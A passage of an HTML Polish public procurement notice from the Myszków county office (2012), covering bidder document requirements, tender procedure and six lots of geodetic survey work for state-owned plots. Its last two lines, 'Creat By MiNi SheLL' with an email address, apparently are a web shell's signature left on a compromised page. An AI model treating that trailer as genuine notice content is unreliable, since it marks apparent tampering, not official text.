<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - załącznik Nr 3 do SIWZ. Zgodnie z art. 26 ust 2b ustawy PZP, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając mu w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (wzór oświadczenia stanowi załącznik nr 7 do SIWZ). Jeżeli wykonawcy wspólnie ubiegają się o zamówienie (konsorcjum) mają obowiązek złożyć każdy z osobna dokumenty wymienione w Rozdziale VII ppkt 2.1, ppkt 2.2, ppkt 2.3, ppkt 2.4 SIWZ. Dokumenty wymienione w Rozdziale VII ppkt 1.1 ppkt. 1.2, ppkt 1.3, ppkt 1.4 SIWZ powinny potwierdzać spełnianie warunków udziału w postępowaniu wspólnie przez Wykonawców składających ofertę, lub powinien je spełniać dowolny Wykonawca spośród Wykonawców składających wspólną ofertę. 
Do ofert należy dołączyć:
a)	Pełnomocnictwo ustanawiające pełnomocnika do reprezentowania ich                       w postępowaniu o udzielenie zamówienia albo reprezentowania                           w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego,
b)	W przypadku złożenia oferty przez spółkę cywilną do oferty należy dołączyć odpowiednie pełnomocnictwo(a) udzielone przez wszystkich wspólników dla jednego ze wspólników lub dla osoby trzeciej, upoważniające osobę umocowaną do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli upoważnienie do złożenia oferty wspólnej wynika  np. z umowy spółki cywilnej, to do oferty zamiast pełnomocnictwa można załączyć tę umowę (oryginał) lub jej kopię poświadczoną notarialnie za zgodność z oryginałem lub jej kopię poświadczoną za zgodność z oryginałem przez wszystkich wspólników.

Dokumenty, o których mowa w Rozdziale VII ppkt 2.2 SIWZ powinny być wystawione na każdego ze wspólników spółki z osobna, natomiast dokumenty z ppkt 2.3 i ppkt 2.4 Rozdziału VII SIWZ na każdego ze wspólników spółki cywilnej i na spółkę cywilną. Oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik Nr 1 do SIWZ) oraz oświadczenie o braku podstaw do wykluczenia z postępowania (załącznik nr 2 do SIWZ) ma obowiązek złożyć każdy ze wspólników spółki cywilnej. 

W przypadku wyboru przez zamawiającego oferty złożonej przez konsorcjum, wykonawcy tworzący konsorcjum zobowiązani będą najpóźniej przed zawarciem umowy w sprawie zamówienia publicznego, do przedłożenia umowy konsorcjum.
Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum.


4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Rozdziale VII ppkt 2.2, ppkt 2.3, ppkt 2.4 SIWZ składa dokumenty o których mowa w § 4 Rozporządzenia Prezesa Rady Ministrów  z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. ( Dz. U. Nr 226, poz. 1817)

W/w dokumenty  należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu w przypadku, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna  lub budzi wątpliwości co do jej prawdziwości.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy(ów), w przypadku wystąpienia okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
- Zamawiający przewiduje zmianę treści umowy w przypadku zmiany przepisów powszechnie obowiązującego prawa
- Działanie siły wyższej (np. klęska żywiołowa, nietypowe warunki atmosferyczne)
Zmiana treści umowy może nastąpić na pisemny wniosek jednej ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiatmyszkowski.bip.net.pl/?c=207<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Myszkowie, ul. Pułaskiego 6, 42-300 Myszków, pokój nr 308.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Myszkowie, 42-300 Myszków, ul. Pułaskiego 6, Biuro Podawcze na Sali Obsługi Interesantów (parter) stanowisko nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie pomiarów i sporządzenie dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  nr 1
Wykonanie pomiaru i sporządzenie  dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej nieruchomości zajętych  pod linie kolejowe Kolej  warszawsko-wiedeńska ( tereny zamknięte) położonych w:
-Myszkowie  ozn nr : 66  o pow. 6,4294 ha   
-Myszkowie  ozn nr : 369  o pow. 9,7202 ha 
-Kręciwilku  ozn nr 1 o pow. 2,5138 ha
-Nieradzie    ozn nr  153 o pow.12,6129 ha
W ramach pomiaru należy:
a.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów   mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
b.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
c.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
d.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
e.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
f.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne w 3  egz.
              - kserokopia szkicu polowego  w 1 egz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie pomiarów i sporządzenie dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  nr 2
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla działek położonych w obrębie Sokolniki ozn. nr 969/1, 969/2, 969/3, 717/1, 717/2, 717/3, 717/4, 717/5 o pow. 1,3798 ha ( droga wojewódzka  Nr 794 relacji Koniecpol - Lelów - Pradła - Pilica - Wolbrom).
W ramach pomiaru należy:
a.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów   mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
b.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
c.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
d.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
e.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
f.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i  
  innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne w 3  egz.
              - kserokopia szkicu polowego  w 1 egz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie pomiarów i sporządzenie dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  nr 3
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla działek wchodzących w skład drogi wojewódzkiej Nr 789 relacji Woźniki - Koziegłowy - Żarki - Lelów, położonych w Myszkowie, obręb:                           
- Nowa Wieś ozn. nr 1995 o pow. 0,4364 ha.
- Myszków    ozn. nr  10050 o pow. 1,5000 ha.
W ramach pomiaru należy:
g.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów   mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
h.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
i.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
j.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
k.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
l.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i  innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne  w 3  egz.
              - kserokopia szkicu polowego  w 1 egz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie pomiarów i sporządzenie dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  nr 4
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla nieruchomości położonej w Myszkowie  ozn. nr 1652 o pow. 0,1421 ha. (droga do stadionu)


W ramach pomiaru należy:
m.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
n.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
o.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
p.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
q.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
r.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne w 3  egz.
              - kserokopia szkicu polowego  w 1 egz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie pomiarów i sporządzenie dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  nr 5
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla nieruchomości położonej w Myszkowie, obręb Mrzygłódka  ozn. nr 1421 o pow. 0,4924 ha. 
W ramach pomiaru należy:
s.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
t.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
u.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
v.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
w.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
x.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i  innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne w 3  egz.
              - kserokopia szkicu polowego  w 1 egz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie pomiarów i sporządzenie dokumentacji geodezyjnej niezbędnej do uregulowania stanu prawnego i ujawnienia własności Skarbu Państwa w księdze wieczystej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  nr 6
Wykonanie pomiaru geodezyjnego i sporządzenie dokumentacji geodezyjno - prawnej do regulacji stanu prawnego dla działek wchodzących w skład drogi powiatowej Nr 08460 dla nieruchomości położonej w Ogorzelniku ozn. nr 190 o pow. 3,6065 ha. 
W ramach pomiaru należy:
a.	dokonać badania ksiąg wieczystych, zbiorów dokumentów oraz Rep. hip. i innych dokumentów   mającego na celu ustalenie czy istnieją dokumenty własności przedmiotowych działek i sporządzić  opinię  w tym zakresie,
b.	zawiadomić o czynnościach przyjęcia granic wszystkich właścicieli działek graniczących z działkami objętymi pomiarem, których granice nie zostały ustalone protokolarnie operatami uzupełniającymi,  
c.	wznowić granice ewidencyjne ww. działek  i zastabilizować wszystkie punkty załamania granic granicznikami betonowymi z podcentrem, a w uzasadnionych przypadkach prętami metalowymi ( dopuszcza się również rurki stalowe, geopunkty, itp. ) po wcześniejszym uzgodnieniu ze zleceniodawcą,
d.	sporządzić  dokumentację geodezyjno - prawną  niezbędną do uregulowania stanu prawnego ww. działek oraz urządzenia lub sprostowania ksiąg wieczystych
e.	nanieść na mapę zasadniczą ze współrzędnych granice  ewidencyjne  ww. działek,
f.	przygotować i przekazać Zamawiającemu następujące materiały:
            - wyrysy do regulacji stanu prawnego w 4 egz.,
- kserokopie zawiadomień o ustaleniu granic ( wraz z potwierdzeniem ) w 1 egz.,
- kserokopie protokołu granicznego w 1 egz.,
- kserokopie badań KW, ZD i Rep. hip.   wraz z opinią  w 1 egz.,
- wykaz zmian danych ewidencyjnych w 3 egz.,
- w przypadkach niezgodności pomiędzy zapisami w księgach wieczystych, zbiorach  dokumentów i  
  innych dokumentach z danymi w ewidencji gruntów należy wykonać wykazy synchronizacyjne  w 3  egz.
              - kserokopia szkicu polowego  w 1 egz..
g.	sporządzić  wykaz działek zajętych pod drogę, dla których konieczne będzie wykonanie podziału ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com